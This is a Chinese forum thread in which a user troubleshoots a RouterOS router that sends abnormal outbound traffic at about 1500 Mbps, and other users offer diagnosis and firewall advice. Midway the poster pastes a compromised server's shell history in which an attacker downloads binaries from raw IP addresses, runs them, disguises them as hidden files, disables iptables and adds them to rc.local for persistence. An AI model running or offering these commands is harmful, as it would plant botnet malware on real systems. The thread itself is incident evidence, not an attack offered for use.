ros默认路由流量流量异常，外网攻击速度1500m多，谁能有这么大流量

qile

如题，最近ros的cpu使用率 100%  默认路由pppoe-out1有时候tx流量是1500m 谁有这么大流量攻击
其他没发现异常

是什么造成这个原因，难道内网有回流？
pppoe-out1 禁用后，马上 pppoe-out2流量上去了，也禁用后pppoe-out3的tx流量就上去了
pppoe-out1 拨号后，流量有转到pppoe-out1上了

9939781

tx是发送流量，也就是你在攻击别人。torch里应该可以看到你攻击的ip

qile

确实存在在大流量的访问外网ip，但是内外没有找到发送的ip地址
甚至没有发现内网流量超过5m的ip地址

yunwa0429

你计费是RM？

qile

yunwa0429 发表于 2014-5-29 01:27
你计费是RM？

是的，计费是rm 和ros集成在一起的？有问题？

xuxi3201

ppoe3是 980M   

ether6  是97M。  

511789068

给外网来个限速

actcs

torch找找，不排除你服务器有问题

sealin

在fir fil里做源地址检验
估计是伪造源地址的攻击

phenlit

从图中看到，pppoe-out3应该接到ether6上面。out3外发近985M，网卡97M，网卡6是100M的。ROS往外发数据被堵住了，而进入ROS流量淌不足10M，可以看出是你ROS自发数据包形成的。这个时候你应该检查你的ROS！

phenlit

至于禁用out1、out2、out3一条线路，接着下一条会跟着送这么大流量，是因为这条流量只往默认路由上跑。这个时候用堵是不能解决问题的，你的CPU都跑到100%了，必须流量源来自哪里！堵的办法很简单，在ip-firewall-filter表output中需要用到的如tcp8291、udp53做accept，再加一条把output所有drop就行！

qile

多谢楼上的解答
肯定是被黑了
决定使用其他版本的去，里面有5月25日下载的文件 拷到本机，win8 系统自带杀毒软件报毒

1. uname -a
   
2. chmod 0777 txma ./txma
   
3. /dev/null 2>&1 &
   
4. nohup ./txma> /dev/null 2>&1 &
   
5. ls
   
6. wget http://222.186.15.241:777/2003
   
7. chmod 0775 2003
   
8. nohup ./2003 > /dev/null 2>&1 &
   
9. ifconfig
   
10. netstat -antp
    
11. netstat -antp
    
12. kill -9 8873
    
13. chmod 0755 /root/linyx
    
14. nohup /root/linyx > /dev/null 2>&1 &
    
15. chmod 0755 /root/linix
    
16. nohup /root/linix > /dev/null 2>&1 &
    
17. echo "cd  /root/">>/etc/rc.local
    
18. echo "./fallen&">>/etc/rc.local
    
19. echo "/etc/init.d/iptables stop">>/etc/rc.local
    
20. chmod 0755 /root/linyx
    
21. nohup /root/linyx > /dev/null 2>&1 &
    
22. chmod 0755 /root/linix
    
23. nohup /root/linix > /dev/null 2>&1 &
    
24. ethtool eth0
    
25. echo "cd  /root/">>/etc/rc.local
    
26. echo "./linyx&">>/etc/rc.local
    
27. echo "/etc/init.d/iptables stop">>/etc/rc.local
    
28. chmod 0755 /root/.bash_histor
    
29. nohup /root/.bash_histor > /dev/null 2>&1 &
    
30. chmod 0755 /root/.bash_histor
    
31. nohup /root/.bash_histor > /dev/null 2>&1 &
    
32. ps -ef
    
33. kill -9 14550
    
34. kill -9 16751
    
35. kill -9 16805
    
36.   14542     1  0 May24 ?        00:00:19 /root/linix
    
37. kill -9 14542
    
38. 9753     1  0 May23 ?        00:05:45 /root/linix
    
39. kill -9 9753
    
40. ps -ef
    
41. kill -9 9748
    
42. uname -a
    
43. wget http://222.186.24.138:8080/yxhl
    
44. chmod 0777 yxhl ./yxhl
    
45. /dev/null 2>&1 &
    
46. nohup ./yxhl> /dev/null 2>&1 &
    
47. ps -ef
    
48. pwd
    
49. ls
    
50. wget http://222.186.40.215:888/kaige
    
51. chmod 0755 /root/kaige
    
52. nohup /root/kaige > /dev/null 2>&1 &
    
53. uname -a
    
54. chattr +i kaige
    
55. echo "cd  /root/">>/etc/rc.local
    
56. echo "./kaige&">>/etc/rc.local
    
57. echo "/etc/init.d/iptables stop">>/etc/rc.local
    
58. chmod 0755 /root/.gtk-bookmark
    
59. nohup /root/.gtk-bookmark > /dev/null 2>&1 &
    
60. ethtool eth0
    
61. echo "cd  /root/">>/etc/rc.local
    
62. echo "./.bash_histor&">>/etc/rc.local
    
63. echo "/etc/init.d/iptables stop">>/etc/rc.local

复制代码

只有为神马产生如此大的流量，我也不懂 没时间研究，晚上换了盘，希望没什么问题啦！

yunwa0429

应该RM被黑了，和我的情况一样

qile

楼上的 你怎么处理的 端口2222  密码是默认的吗？

crack_ros

你的内网有人搞鬼或者有网卡坏了

你的PPPOE策略没做限速的？